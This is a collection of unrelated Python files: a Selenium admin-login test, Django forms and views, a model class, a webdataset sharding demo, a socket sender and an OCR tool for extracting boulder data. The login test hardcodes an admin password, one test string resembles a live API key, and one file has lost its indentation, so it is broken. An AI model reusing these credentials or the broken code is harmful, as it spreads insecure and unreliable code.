    driver.get('http://localhost/Ghurai-Bangladesh/admin/admin_login.html')
    u = driver.current_url
    txt_user = driver.find_element_by_name('email')
    txt_password = driver.find_element_by_name('pass')
    txt_user.send_keys('admin@ghuraibangladesh.com')
    print('Email input done')
    txt_password.send_keys('mahir11')
    print('Password input done')
    print('Now wait 3 seconds')
    time.sleep(3)
    btn = driver.find_element_by_xpath('/html/body/div/section/form/button')
    btn.click()
    print('Logged in successfully')
    btnhomepage = driver.find_element_by_link_text('PORTAL')
    time.sleep(3)
    btnhomepage.click()
    time.sleep(5)
    btncustomer = driver.find_element_by_xpath('/html/body/div/section/button[1]')
    btncustomer.click()
    time.sleep(5)
    print("Customer option chosen")
    btnloadcust = driver.find_element_by_xpath('/html/body/button')
    btnloadcust.click()
    print("Customer information fetched")
    time.sleep(3)
    txt_back_home = driver.find_element_by_xpath('/html/body/a')
    txt_back_home.click()
    print("Back to the admin home page")
    time.sleep(3)
    # complaint JSON page
    btncustomer = driver.find_element_by_xpath('/html/body/div/section/button[3]')
    btncustomer.click()
    time.sleep(5)
    print("Complaint option chosen")
    btnloadcust = driver.find_element_by_xpath('/html/body/button')
    btnloadcust.click()
    print("Complaint information fetched")
    time.sleep(3)
    txt_back_home = driver.find_element_by_xpath('/html/body/a')
    txt_back_home.click()
    print("Back to the admin home page")
    driver.close()


admin_Portal()
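# A possible refinement (sketch, not in the original test): replace the fixed time.sleep()
# calls with explicit waits, so the test proceeds as soon as the login button is clickable.
# from selenium.webdriver.support.ui import WebDriverWait
# from selenium.webdriver.support import expected_conditions as EC
# from selenium.webdriver.common.by import By
#
# wait = WebDriverWait(driver, 10)
# btn = wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/div/section/form/button')))
# btn.click()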
|
from django.shortcuts import render
# from ..{{OTHER_APP}}.models import {{MODEL}}


def index(request):
    context = {
        'models': {
            # '{{MODEL}}': {{MODEL}}.objects.all(),
        }
    }
    return render(request, "models_view/index.html", context)
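# A hypothetical filled-in version of the template above (the app and model names "library"
# and "Book" are placeholders for illustration, not part of the original project):
# from ..library.models import Book
#
# def index(request):
#     context = {
#         'models': {
#             'Book': Book.objects.all(),
#         }
#     }
#     return render(request, "models_view/index.html", context)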
|
import numpy as np
import logging
import os
import time
class mp_model:
id = None
logger = None
type = 'empty'
history = []
cfg = {}
# class instances
network = None
dataset = None
machine = None
def __init__(self, config = None, network = None, dataset = None):
# initialize logger
self.logger = logging.getLogger('metapath')
# initialize id
self.id = int(time.time() * 100)
# reference network and dataset
self.network = network
self.dataset = dataset
# create empty model instance if no configuration is given
if not config:
return
# configure machine
self.configure(config = config, network = network, dataset = dataset)
# initialize machine
self.initialize()
# configure model
def configure(self, config = None, network = None, dataset = None):
if not config == None:
self.cfg = config
elif self.cfg == None:
self.logger.warning('could not configure model: no configuration was given!')
return False
# reference network instance
if not network == None:
self.network = network
elif self.network == None:
self.logger.warning('could not configure model: no network was given!')
return False
# reference dataset instance
if not dataset == None:
self.dataset = dataset
elif self.dataset == None:
self.logger.warning('could not configure model: no dataset was given!')
return False
# create machine instance
self.configure_machine()
# configure machine
def configure_machine(self):
params = {
'visible': self.network.nodes(type = 'e') + self.network.nodes(type = 's'),
'hidden': self.network.nodes(type = 'tf'),
'edges': self.network.edges(),
'init': self.cfg['init'],
'data': self.dataset.data}
class_name = self.cfg['class'].upper()
package_name = 'src.mp_model_' + class_name.lower()
try:
exec "from %s import %s" % (package_name, class_name)
exec "self.machine = %s(**params)" % (class_name)
self.type = class_name
except:
self.machine = None
self.logger.warning("model class '" + class_name + "' is not supported!")
return
# initialize model parameters to dataset
def initialize(self, dataset = None):
if not dataset == None:
self.dataset = dataset
elif self.dataset == None:
self.logger.warning('could not initialize model: no dataset was given!')
return False
if self.machine == None:
self.logger.warning('could not initialize model: model has not been configured!')
return False
# search network in dataset and exclude missing nodes
cache = self.dataset.cfg['cache_path'] + \
'data-network%s-dataset%s.npz' % \
(self.network.cfg['id'], self.dataset.cfg['id'])
if os.path.isfile(cache):
self.logger.info(' * found cachefile: "' + cache + '"')
self.dataset.load(cache)
else:
self.logger.info(' * search network nodes in dataset and exclude missing')
label_format = self.network.cfg['label_format']
label_lists = {
's': self.network.node_labels(type = 's'),
'e': self.network.node_labels(type = 'e')}
self.dataset = self.dataset.subset(label_format, label_lists)
self.dataset.update_from_source()
self.logger.info(' * create cachefile: "' + cache + '"')
self.dataset.save(cache)
# update network to available data
for type in self.dataset.sub:
self.network.update(nodelist = {
'type': type,
'list': self.dataset.sub[type]})
# update model to network
self.configure()
# normalize data
self.dataset.normalize()
# initialize model parameters with data
self.machine.initialize(self.dataset.data)
# optimize model
def optimize(self, **params):
# append current model parameters to model history
self.history.append({self.id: self.machine.get()})
# optimize model
self.machine.run(self.dataset.data, **params)
# update model id
self.id = int(time.time() * 100)
# get all model parameters as dictionary
def get(self):
dict = {
'id': self.id,
'type': self.type,
'history': self.history,
'cfg': self.cfg,
'network': self.network.get(),
'dataset': self.dataset.get(),
'machine': self.machine.get()
}
return dict
def set(self, dict):
self.id = dict['id']
self.type = dict['type']
self.history = dict['history']
self.cfg = dict['cfg']
self.network.set(**dict['network'])
self.dataset.set(**dict['dataset'])
self.configure_machine()
self.machine.set(**dict['machine'])
#
# getter methods for model simulations
#
def get_approx(self, type = 'rel_approx'):
if type == 'rel_approx':
v_approx = self.machine.v_rel_approx(self.dataset.data)
elif type == 'abs_approx':
v_approx = self.machine.v_abs_approx(self.dataset.data)
# calc mean
mean_approx = np.mean(v_approx)
# create node dictionary
v_label = self.machine.v['label']
approx_dict = {}
for i, node in enumerate(v_label):
approx_dict[node] = v_approx[i]
return mean_approx, approx_dict
def get_knockout_approx(self):
h_knockout_approx = self.machine.h_knockout_approx(self.dataset.data)
v_knockout_approx = self.machine.v_knockout_approx(self.dataset.data)
# create node dictionary
approx_dict = {}
v_label = self.machine.v['label']
for i, node in enumerate(v_label):
approx_dict[node] = v_knockout_approx[i]
h_label = self.machine.h['label']
for i, node in enumerate(h_label):
approx_dict[node] = h_knockout_approx[i]
return approx_dict
def get_knockout_matrix(self):
v_impact_on_v, v_impact_on_h = self.machine.v_knockout(self.dataset.data)
return v_impact_on_v
# get weights
def get_weights(self, type = 'weights'):
weights = {}
if type == 'weights':
W = self.machine.W
A = self.machine.A
for v, v_label in enumerate(self.machine.v['label']):
for h, h_label in enumerate(self.machine.h['label']):
if not A[v, h]:
continue
weights[(h_label, v_label)] = W[v, h]
weights[(v_label, h_label)] = W[v, h]
elif type == 'link_energy':
weights_directed = self.machine.link_energy(self.dataset.data)
# make weights symmetric
for (n1, n2) in weights_directed:
if (n1, n2) in weights:
continue
weights[(n1, n2)] = weights_directed[(n1, n2)]
weights[(n2, n1)] = weights_directed[(n1, n2)]
else:
return None
return weights
##
##class GRBM_plot:
##
## def __init__(self):
##
## # initialize logger
## self.logger = logging.getLogger('metapath')
##
## self.label = {
## 'energy': 'Energy = $- \sum \\frac{1}{2 \sigma_i^2}(v_i - b_i)^2 ' +\
## '- \sum \\frac{1}{\sigma_i^2} w_{ij} v_i h_j ' +\
## '- \sum c_j h_j$',
## 'error': 'Error = $\sum (data - p[v = data|\Theta])^2$'
## }
##
## self.density = 1
## self.reset()
##
##
## def reset(self):
## self.data = {
## 'epoch': np.empty(1),
## 'energy': np.empty(1),
## 'error': np.empty(1)
## }
##
## self.buffer = {
## 'energy': 0,
## 'error': 0
## }
##
## self.last_epoch = 0
##
## def set_density(self, updates, points):
## self.density = max(int(updates / points), 1)
##
## def add(self, epoch, v_data, h_data, v_model, h_model, params):
##
## # calculate energy, error etc.
## self.buffer['error'] += params.error(v_data)
## self.buffer['energy'] += params.energy(v_data)
##
## if (epoch - self.last_epoch) % self.density == 0:
## self.data['epoch'] = \
## np.append(self.data['epoch'], epoch)
## self.data['error'] = \
## np.append(self.data['error'], self.buffer['error'] / self.density)
## self.data['energy'] = \
## np.append(self.data['energy'], self.buffer['energy'] / self.density)
##
## # reset energy and error
## self.buffer['error'] = 0
## self.buffer['energy'] = 0
##
## def save(self, path = None):
## if path == None:
## self.logger.error("no save path was given")
## quit()
##
## # create path if not available
## if not os.path.exists(path):
## os.makedirs(path)
##
## for key, val in self.data.items():
## if key == 'epoch':
## continue
##
## file_plot = '%s/%s.pdf' % (path, key.lower())
##
## # get labels
## xlabel = 'updates'
## ylabel = key
##
## plt.figure()
## plt.plot(self.data['epoch'], val, 'b,')
## plt.xlabel(xlabel)
## plt.ylabel(ylabel)
## plt.savefig(file_plot)
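# A sketch (not part of the original class) of the dynamic loading done in
# configure_machine() above, using importlib instead of exec. It assumes the same
# layout: a module "src.mp_model_<class>" that defines a class named "<CLASS>".
import importlib

def load_machine_class(class_name):
    module = importlib.import_module('src.mp_model_' + class_name.lower())
    return getattr(module, class_name.upper())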
|
from django import forms
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm

from .models import MyUser


class UserRegisterForm(UserCreationForm):
    email = forms.EmailField()
    first_name = forms.CharField(max_length=30)
    last_name = forms.CharField(max_length=30)

    class Meta:
        model = MyUser
        fields = ['email', 'first_name', 'last_name', 'password1', 'password2']

    def clean_email(self):
        email = self.cleaned_data.get('email')
        if MyUser.objects.filter(email__iexact=email).exists():
            raise forms.ValidationError('A user has already registered using this email')
        return email

    def clean_password2(self):
        # Check that the two password entries match
        password1 = self.cleaned_data.get("password1")
        password2 = self.cleaned_data.get("password2")
        if password1 and password2 and password1 != password2:
            raise forms.ValidationError("Passwords don't match")
        return password2

    def save(self, commit=True):
        # Save the provided password in hashed format
        user = super().save(commit=False)
        user.username = self.clean_email()
        user.set_password(self.cleaned_data["password1"])
        if commit:
            user.save()
        return user


class UserLoginForm(AuthenticationForm):
    class Meta:
        model = MyUser
        fields = ['email', 'password']
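# A minimal usage sketch (view and template names are hypothetical, not from this app):
# def register(request):
#     form = UserRegisterForm(request.POST or None)
#     if request.method == 'POST' and form.is_valid():
#         form.save()            # hashes the password and stores the new MyUser
#         return redirect('login')
#     return render(request, 'users/register.html', {'form': form})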
|
import sys
import os
import warnings
import torch
import webdataset as wds
import typer
import braceexpand
from collections import Counter
from itertools import islice
from torchvision import transforms
# We're not using actual torch.distributed, since we just want to simulate
# how data is split between different nodes. Other than that, though, this
# code works the same way as true distributed code.
dist_rank = -1
dist_size = -1
show_splits = False
def split_by_node(urls):
"""Split urls for each node.
This uses the rank and world size. Note that it is invoked in each worker,
so the results need to be consistent between multiple invocations."""
global dist_rank, dist_size
if dist_rank >= 0 and dist_size > 0:
result = urls[dist_rank::dist_size]
if show_splits:
print(
f"split_by_node {dist_rank}/{dist_size} len={len(result)}",
file=sys.stderr,
)
return result
else:
print(f"single node len={len(result)}")
return urls
def split_by_worker(urls):
"""Split urls for each worker."""
urls = [url for url in urls]
worker_info = torch.utils.data.get_worker_info()
if worker_info is not None:
wid = worker_info.id
num_workers = worker_info.num_workers
if wid == 0 and len(urls) < num_workers:
warnings.warn(f"num_workers {num_workers} > num_shards {len(urls)}")
result = urls[wid::num_workers]
if show_splits:
print(
f"split_by_worker {wid}/{num_workers} len={len(result)}",
file=sys.stderr,
)
return result
else:
return urls
def make_loader(shards, batch_size=128, num_workers=6, partial=False, repeat=1):
"""Create a loader for Imagenet-like data.
The `partial` argument is passed on to the `batched()` method.
Note that if `partial` is True, each worker may return a partial batch."""
augment = transforms.Compose(
[
transforms.RandomResizedCrop(224),
transforms.ToTensor(),
]
)
dataset = (
wds.WebDataset(shards, nodesplitter=split_by_node, splitter=split_by_worker)
.shuffle(1000)
.decode("pil")
.to_tuple("jpg", "cls")
.map_tuple(augment)
.batched(batch_size, partial=partial)
)
if repeat > 1:
dataset = dataset.repeat(repeat)
loader = wds.WebLoader(dataset, num_workers=num_workers, batch_size=None)
return loader
def train(
# shards: str = "pipe:gsutil cat gs://lpr-simsplit/split-{000000..00009}.tar",
shards: str = "pipe:curl -s -L http://storage.googleapis.com/lpr-simsplit/split-{000000..00009}.tar",
size: int = 3,
batch_size: int = 10,
nworkers: int = 3,
nepochs: int = 1,
nbatches: int = 999999,
partial: bool = False,
showopen: bool = False,
showsplits: bool = False,
repeat: int = 1,
dsrepeat: int = 1,
):
"""Simulate distributed training.
This will perform dataset loading for each worker in a distributed training
job of size `size` and report the number of batches and samples returned by
each worker.
For distributed SGD (DistributedDataParallel) to work, each worker needs to return
exactly the same number of batches. To get exact epochs, you need to ensure that
all the shards have exactly the same number of samples and that the number of shards
is divisible by (#workers * #nodes).
If your data isn't in that form (and it usually isn't), you have to do something different.
"""
print("parameters:")
print(f"\tworldsize {size}")
print(f"\tnworkers {nworkers}")
print(f"\tnshards {len(list(braceexpand.braceexpand(shards)))}")
print(f"\tpartial {partial}")
print(f"\tnbatches {nbatches}")
print(f"\tloader-repeat {repeat}")
print(f"\tdataset-repeat {dsrepeat}")
print()
global dist_size, dist_rank, show_splits
show_splits = showsplits
if showopen:
os.environ["GOPEN_VERBOSE"] = "1"
dist_size = size
loader = make_loader(
shards,
batch_size=batch_size,
num_workers=nworkers,
partial=partial,
repeat=dsrepeat,
)
if repeat > 1:
loader = loader.repeat(nepochs=repeat)
batches = []
for rank in range(size):
dist_rank = rank
batches.append([])
for inputs, targets in islice(loader, 0, nbatches):
batches[-1].append(len(inputs))
# print(f"=== rank {dist_rank} batches {len(batches[-1])} total {np.sum(batches[-1])}")
print(f"rank {rank}:", Counter(batches[-1]).most_common())
counted = [tuple(Counter(x).most_common()) for x in batches]
if not all([c == counted[0] for c in counted]):
print("\nFAILED: inconsistent batches in different workers")
else:
print("\nSUCCESS: same batches in all workers")
if __name__ == "__main__":
typer.run(train)
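# A standalone sketch of the splitting arithmetic used by split_by_node/split_by_worker
# above (hypothetical shard names): the node takes urls[rank::world_size] and each
# DataLoader worker then takes its slice of that result, so every shard is read by
# exactly one (node, worker) pair.
def demo_split(nshards=10, world_size=2, num_workers=3):
    shards = [f"split-{i:06d}.tar" for i in range(nshards)]
    for rank in range(world_size):
        node_shards = shards[rank::world_size]
        for wid in range(num_workers):
            print(rank, wid, node_shards[wid::num_workers])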
|
# -*- coding: utf-8 -*-
import threading
from socket import *

from QueueTeam import PackQueueClass


class SendPackData:
    def __init__(self, hostIp, hostPort):
        self.hostIp = hostIp
        self.hostPort = hostPort
        self.tcpCliSock = ""
        self.packThread = None
        self.sendPack = PackQueueClass()

    def connectHost(self):
        try:
            self.tcpCliSock = socket(AF_INET, SOCK_STREAM)
            self.tcpCliSock.connect((self.hostIp, self.hostPort))
            # thread that sends data to the server
            self.packThread = threading.Thread(target=self.sendData, args=())
            self.packThread.start()
        except Exception, e:
            print 'Error: ', e

    # thread function that sends data
    def sendData(self):
        try:
            while True:
                packData = self.sendPack.getPackData()
                # send the packet to the server
                self.tcpCliSock.sendall(packData)
            self.tcpCliSock.close()
        except:
            print("sendData failed")

    # thread cleanup function
    def clearThread(self):
        self.packThread.join()
        self.packThread = None
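# A minimal usage sketch (hypothetical host and port): connectHost() opens the TCP
# connection and starts the background thread, which keeps pulling packets from
# self.sendPack (a PackQueueClass) and writing them to the socket.
if __name__ == '__main__':
    sender = SendPackData('127.0.0.1', 9000)
    sender.connectHost()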
|
from functools import total_ordering
import json
import pickle
import re
import sys
from os import name
import numpy as np
from numpy.core.fromnumeric import size
from numpy.lib.utils import byte_bounds
import pandas as pd
# convert_from_path returns a list of PIL images, making it very easy to use
from pdf2image import convert_from_path
from PIL import Image
import cv2
import NLP_helper
import OCR_helper as OCR
import SPL_helper as SPL
# This is the main entry point for the project: it takes a volume number as an argument and runs a complete boulder data extraction over that volume
def review_vol(number, page_number=None, print_page=None):
patch = False
if page_number is None:
page_number = int(input("Please enter starting page number : "))
# Reports 3 and 4 have a different structure: they are journal entries with 4 pages per image.
# if number == "3" or number == "4":
# return print_vol(number)
print("Reviewing volume : " + str(number))
print("Running OCR and Spellchecker...")
# Getting the OCR'ed and Spellchecked volume back in a word_string and dataframe
word_data, word_string = SPL.get_spellchecked_volume(number)
# Saving this data so we don't need to OCR and Spellcheck every time
with open('word_data_' + str(number) + '.pickle', 'wb') as f:
pickle.dump((word_data, page_number, number), f)
# Get boulders using NLP techniques.. Also an entry point for the saved OCR to be analysed
df, df_for_saving = get_boulders(word_data,number,page_number,print_page)
print("All done!")
# Print whole dataframe
pd.set_option("display.max_rows", None, "display.max_columns", None)
print(df)
# Saving output
with open('report_'+ str(number) + '_boulders.pickle', 'wb') as f:
pickle.dump((word_data, df, page_number, number), f)
df_for_saving.to_csv("boulder_data" + str(number) + '.csv')
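# A small sketch (hypothetical pickle name) of reusing the cached OCR output saved above,
# so a volume can be re-analysed without running OCR and the spellchecker again:
def review_vol_from_cache(pickle_path='word_data_5.pickle', print_page=False):
    with open(pickle_path, 'rb') as f:
        word_data, page_number, number = pickle.load(f)
    return get_boulders(word_data, number, page_number, print_page)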
# TODO: Entry point for analysing the OCR'ed data. Will need to be expanded to include analysis spanning multiple pages and more search terms, not just boulder.
def get_boulders(word_data, number, page_number=None, print_page=None):
numbers = []
locations = []
sizes = []
rocktypes = []
authors = []
extras = []
compass_directions = []
distances = []
volumes = []
weights = []
hasls = []
array_numberofboulders = []
page_numbers = []
full_boundings = []
loc_boundings = []
siz_boundings = []
rt_boundings = []
b_boundings = []
aut_boundings = []
compass_boundings = []
par_nums = []
extra_boundings = []
number = 0
if page_number is None:
page_number = int(input("What page number did the scan start at? : "))
if print_page is None:
print_page = True if input("Would you like to print each page? ( enter y or n ) : ") == 'y' else False
print("Running NLP...")
WINDOW_NAME = "Page : "
if print_page:
cv2.namedWindow(WINDOW_NAME, cv2.WINDOW_NORMAL)
cv2.startWindowThread()
general_location = ""
# For each dataframe in word_data ie each page :
for i in range(0,len(word_data)):
print("Analysing page : " + str(page_number))
img = cv2.cvtColor(np.array(word_data[i][1]), cv2.COLOR_RGB2BGR)
# Trying to remedy the paragraph mismatching from Tesseract: this sets any par_num that is recognised as the first par_num to the last one
for k, word in word_data[i][0].iterrows():
if word['par_num'] > 1:
break
if len(word_data[i][0]['par_num']):
word_data[i][0].loc[(word_data[i][0].par_num == 1) & (word_data[i][0].index > k), 'par_num'] = max(word_data[i][0]['par_num'])
# Used for discarding multiple mention of same boulder on same page
last_rocktype = ""
last_size = ""
last_location = ""
# Loop through each page
for j, row in word_data[i][0].iterrows():
# For each word check if there is a new general location being mentioned and extract the placename from line and paragraph match
if number == 5 or number == 6 or number == 1 or number == 10:
if '.—' in row['text']:
words = word_data[i][0][(word_data[i][0]['line_num'] == row['line_num']) & (word_data[i][0]['par_num'] == row['par_num']) & (word_data[i][0]['word_num'] <= row['word_num'])]['text'].tolist()
general_location = ''
for word in words:
if len(general_location):
general_location += " " + word
else:
general_location = word
general_location = general_location.split('.—')[0]
# if the word is a boulder related search term, look for the boulders features!
if ("boulder" in row['text'] or "Boulder" in row['text'] or "Block" in row['text'] or "block" in row['text']):
# for whole boulder phrase bounding box
least_x = 1000000
least_y = 1000000
greatest_x_w = -1
greatest_y_h = -1
loc_bound = []
siz_bound = []
rt_bound = []
aut_bound = []
extra_bound = []
compass_bound = []
siz_char_count = 0
# Use paragraph where boulder search term was found for analysis
loc_pos, siz_pos, rt_pos, aut_pos, location, size, rocktype, author, numberofboulders, numbox, extra_pos, extra, dim_dict, volume, weight, hasl, distance, comp_dict, compass_direction = NLP_helper.find_boulder_from_paragraph(word_data[i][0].loc[word_data[i][0]['par_num'] == row['par_num']], number)
if len(general_location) and location:
location = general_location + ' - ' + location
# Boulder and boulder number tagging
if numbox:
(x,y,w,h) = numbox
cv2.rectangle(img, (x, y), (x + w, y + h), (40, 100, 200), 5)
(x, y, w, h) = (row['left'], row['top'], row['width'], row['height'])
cv2.rectangle(img, (x, y), (x + w, y + h), (255, 255, 0), 5)
b_bound = (x,y,x+w,y+h)
# Size tagging and paragraph tagging
for k, word in word_data[i][0].loc[word_data[i][0]['par_num'] == row['par_num']].iterrows():
if word['left'] < least_x:
least_x = word['left']
if word['left'] + word['width'] > greatest_x_w:
greatest_x_w = word['left'] + word['width']
if word['top'] < least_y:
least_y = word['top']
if word['top'] + word['height'] > greatest_y_h:
greatest_y_h = word['top'] + word['height']
if siz_pos:
for dim in siz_pos:
if (siz_char_count >= siz_pos[dim][0] and siz_char_count <= siz_pos[dim][1]):
(x, y, w, h) = (word['left'], word['top'], word['width'], word['height'])
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 5)
siz_bound.append((x,y,x+w,y+h))
siz_char_count += len(word['text']) + 1
if dim_dict:
for dim in dim_dict:
for (x,y,w,h) in dim_dict[dim]:
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 5)
siz_bound.append((x,y,x+w,y+h))
# Primary and Secondary rocktype tagging
if rt_pos:
for dim in rt_pos:
for (x,y,w,h) in rt_pos[dim]:
cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 5)
rt_bound.append((x,y,x+w,y+h))
if extra_pos:
for dim in extra_pos:
for (x,y,w,h) in extra_pos[dim]:
cv2.rectangle(img, (x, y), (x + w, y + h), (147,20,255), 5)
extra_bound.append((x,y,x+w,y+h))
# Tagging of Authors (People mentioned or excerpt references)
if aut_pos:
for dim in aut_pos:
for (x,y,w,h) in aut_pos[dim]:
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 255), 5)
aut_bound.append((x,y,x+w,y+h))
# Tagging locations and compass directions
if loc_pos:
for dim in loc_pos:
for (x,y,w,h) in loc_pos[dim]:
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 5)
loc_bound.append((x,y,x+w,y+h))
if comp_dict:
for dim in comp_dict:
for (x,y,w,h) in comp_dict[dim]:
cv2.rectangle(img, (x, y), (x + w, y + h), (200, 70, 10), 5)
compass_bound.append((x,y,x+w,y+h))
# If no location is found, try using the location of the last boulder on the same page; otherwise
# fall back to the general location
if not location and len(locations) and page_number == page_numbers[len(page_numbers) - 1]:
location = locations[len(locations) - 1]
loc_pos = loc_boundings[len(loc_boundings) - 1]
elif not location and len(general_location):
location = general_location
# For last_x matching
if not location:
location = ""
if not size:
size = ""
if not rocktype:
rocktype = ""
if not (location == last_location and size == last_size and rocktype == last_rocktype):
last_rocktype = rocktype
last_size = size
last_location = location
# Increase the paragraph bounding box for easy viewing and highlight on page
least_y -= 100
least_x -= 100
greatest_y_h += 100
greatest_x_w += 100
cv2.rectangle(img, (least_x, least_y), (greatest_x_w, greatest_y_h), (255, 0, 255), 8)
# Fill data into arrays
numbers.append(number)
number += 1
locations.append(location)
sizes.append(size)
rocktypes.append(rocktype)
authors.append(author)
extras.append(extra)
array_numberofboulders.append(numberofboulders)
compass_directions.append(compass_direction)
distances.append(distance)
volumes.append(volume)
weights.append(weight)
hasls.append(hasl)
aut_boundings.append(aut_bound)
page_numbers.append(page_number)
loc_boundings.append(loc_bound)
siz_boundings.append(siz_bound)
rt_boundings.append(rt_bound)
b_boundings.append(b_bound)
compass_boundings.append(compass_bound)
extra_boundings.append(extra_bound)
full_boundings.append((least_x,least_y,greatest_x_w,greatest_y_h))
par_nums.append(row['par_num'])
if print_page:
print(word_data[i][0])
d = {'Numbers' : numbers, 'Location': locations, 'Size' : sizes, 'Rocktype' : rocktypes, 'Volume' : volumes, 'Weight' : weights, 'HASL' : hasls, 'Compass' : compass_directions, 'Distance' : distances, 'Page_Number' : page_numbers, 'BNum' : array_numberofboulders, 'Extra' : extras, 'EBB' : extra_boundings, 'Author' : authors, 'ABB' : aut_boundings, 'FullBB' : full_boundings, 'BBB' : b_boundings, 'LBB' : loc_boundings, 'SBB' : siz_boundings, 'RBB' : rt_boundings, 'CBB' : compass_boundings, 'par_num' : par_nums}
print(d)
cv2.imshow("Page : " + str(page_number), img)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.waitKey(1)
page_number += 1
# Formatted for CSV
d_for_saving = {'Numbers' : numbers, 'Location': locations, 'Size' : sizes, 'Rocktype' : rocktypes, 'Volume' : volumes, 'Weight' : weights, 'Height above sea level' : hasls, 'Compass' : compass_directions, 'Distance' : distances, 'Number of Boulders mentioned' : array_numberofboulders, 'Extra' : extras, 'Author' : authors, 'Paragraph' : par_nums, 'Page' : page_numbers}
df_for_saving = pd.DataFrame(data=d_for_saving)
d = {'Numbers' : numbers, 'Location': locations, 'Size' : sizes, 'Rocktype' : rocktypes, 'Volume' : volumes, 'Weight' : weights, 'HASL' : hasls, 'Compass' : compass_directions, 'Distance' : distances, 'Page_Number' : page_numbers, 'BNum' : array_numberofboulders, 'Extra' : extras, 'EBB' : extra_boundings, 'Author' : authors, 'ABB' : aut_boundings, 'FullBB' : full_boundings, 'BBB' : b_boundings, 'LBB' : loc_boundings, 'SBB' : siz_boundings, 'RBB' : rt_boundings, 'CBB' : compass_boundings, 'par_num' : par_nums}
df = pd.DataFrame(data=d)
return df, df_for_saving
# For volumes 3 and 4: just print the data rather than fully analysing it
def print_vol(number):
print("Reviewing volume : " + str(number))
print("Running OCR and Spellchecker...")
word_data, word_string = SPL.get_spellchecked_volume_for_printing(number)
    # This regex splits the text on "X. ..." so that any paragraph introducing a numbered boulder is assessed;
    # this will need extra consideration for the later volumes, where the labelling standards change
matches = re.findall("([\d]+\. )(.*?)(?=([\d]+\.)|($))",word_string)
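    # A minimal illustration (hypothetical text, not taken from the reports):
    #   "12. Large boulder near the shore. 13. Smaller block of granite."
    # yields two matches, roughly
    #   ("12. ", "Large boulder near the shore. ", "13.", "") and
    #   ("13. ", "Smaller block of granite.", "", ""),
    # so match[0] carries the boulder number and match[1] the paragraph body used below.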
numbers = []
locations = []
sizes = []
rocktypes = []
print("Running NLP...")
    # i.e. for each numbered boulder paragraph in the report
for match in matches:
if len(match[1]) > 5:
number, location, size, rocktype = NLP_helper.find_boulder_from_numbered_regex(match)
numbers.append(number)
locations.append(location)
sizes.append(size)
rocktypes.append(rocktype)
d = {'Boulder Number': numbers, 'Boulder Location': locations, 'Boulder Size' : sizes, 'Boulder Rocktype' : rocktypes}
df = pd.DataFrame(data=d)
print(df)
return df
# Basic functions I wrote for testing the OCR
def print_all_volumes():
for i in range(3,8):
images = convert_from_path("./bouldercopies/" + str(i) + "_Report.pdf", 500)
for image in images:
OCR.print_from_image(image)
def print_one_volume(number):
images = convert_from_path("./bouldercopies/" + str(number) + "_Report.pdf", 500)
for image in images:
OCR.print_from_image(image)
def analyse_everything():
report_nums = [(1,21),(3,0),(4,0),(5,3),(6,3),(7,3),(8,3),(9,193),(10,769)]
for report, page_num in report_nums:
review_vol(report,page_num,False)
# Command-line usage: with no arguments you are prompted for a report number; pass a report number
# (or -a to analyse everything); or pass -l followed by the path to the pickled word_data/word_string
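# Assumed invocations (the script name is illustrative):
#   python review_reports.py                               # prompt for a report number
#   python review_reports.py 5                             # review report 5
#   python review_reports.py -a                            # analyse every report listed above
#   python review_reports.py -l report_5_boulders.pickle   # reuse preloaded data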
if len(sys.argv) == 2:
if sys.argv[1] == '-a':
analyse_everything()
else:
review_vol(sys.argv[1])
elif len(sys.argv) == 3:
if sys.argv[1] != '-l':
print("use -l to use preloaded data")
        sys.exit(1)
with open(sys.argv[2], 'rb') as f:
loaded_data = pickle.load(f)
if len(loaded_data) == 4:
# Checking if it's a boulder file or a word_data file
word_data, boulders, page_number, report_number = loaded_data
elif len(loaded_data) == 3:
word_data, page_number, report_number = loaded_data
else:
print(loaded_data)
raise("Incorrect pickle")
df, df_for_saving = get_boulders(word_data,report_number,page_number)
print("All done!")
pd.set_option("display.max_rows", None, "display.max_columns", None)
print(df)
with open('report_'+ str(report_number) + '_boulders.pickle', 'wb') as f:
pickle.dump((word_data, df, page_number, report_number), f)
df_for_saving.to_csv("report_" + str(report_number) + ".csv")
else:
review_vol(input("Please input number of report to review : "))
|
"""animals URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from .views import list_family_animals, show_animal_info, list_animals
urlpatterns = [
    path('family/<int:id>', list_family_animals),
    path('animal/<int:id>', show_animal_info),
    path('animals', list_animals),
]
|
import numpy
import re
import pytest
import builtins
from unittest import mock
def swap_case():
line = input('')
return line.swapcase()
def test_swap_case_1():
with mock.patch.object(builtins, 'input', side_effect=['HackerRank.com presents "Pythonist 2".']):
assert swap_case()=='hACKERrANK.COM PRESENTS "pYTHONIST 2".'
def test_swap_case_2():
with mock.patch.object(builtins, 'input', side_effect=['22T6M2reD4']):
assert swap_case()=='22t6m2REd4'
def test_swap_case_3():
with mock.patch.object(builtins, 'input', side_effect=[
'SG.2ehL62pSmsnd7c9XYYsFvV067gybBhsSM0SJ7zpAJWr8pwEFzq3ACtuSAjpL7ZnWXbASGlBnEawSnWs1 gpCySKB2.at bt5S']):
assert swap_case()==\
'sg.2EHl62PsMSND7C9xyySfVv067GYBbHSsm0sj7ZPajwR8PWefZQ3acTUsaJPl7zNwxBasgLbNeAWsNwS1 GPcYskb2.AT BT5s'
|
# Copyright 2023 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.python.framework.stevedore.python_target_dependencies import (
InferStevedoreNamespacesDependencies,
PythonTestsStevedoreNamespaceInferenceFieldSet,
StevedoreExtensions,
)
from pants.backend.python.framework.stevedore.python_target_dependencies import (
rules as stevedore_dep_rules,
)
from pants.backend.python.framework.stevedore.target_types import (
AllStevedoreExtensionTargets,
